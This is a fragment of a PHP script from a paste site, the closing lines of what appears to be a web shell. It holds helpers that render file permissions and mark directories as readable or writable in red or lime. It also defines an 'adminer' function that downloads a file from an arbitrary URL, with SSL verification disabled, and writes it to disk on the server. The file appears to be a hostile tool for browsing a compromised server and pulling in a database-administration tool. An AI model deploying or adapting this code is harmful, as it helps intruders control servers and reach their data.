  701. $info .= (($perms & 0x0004) ? 'r' : '-');
  702. $info .= (($perms & 0x0002) ? 'w' : '-');
  703. $info .= (($perms & 0x0001) ?
  704. (($perms & 0x0200) ? 't' : 'x' ) :
  705. (($perms & 0x0200) ? 'T' : '-'));
  706. return $info;
  707. }
  708.  
  709. function w($dir, $perm) {
  710. if (!is_writable($dir)) {
  711. return "<font color=red>" . $perm . "</font>";
  712. } else {
  713. return "<font color=lime>" . $perm . "</font>";
  714. }
  715. }
  716.  
  717. function r($dir, $perm) {
  718. if (!is_readable($dir)) {
  719. return "<font color=red>" . $perm . "</font>";
  720. } else {
  721. return "<font color=lime>" . $perm . "</font>";
  722. }
  723. }
  724.  
  725.  
  726. function adminer($url, $isi) {
  727. $fp = fopen($isi, "w");
  728. $ch = curl_init();
  729. curl_setopt($ch, CURLOPT_URL, $url);
  730. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  731. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  732. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  733. curl_setopt($ch, CURLOPT_FILE, $fp);
  734. return curl_exec($ch);
  735. curl_close($ch);
  736. fclose($fp);
  737. ob_flush();
  738. flush();
  739. }
  740. ?>
Add Comment
Please, Sign In to add comment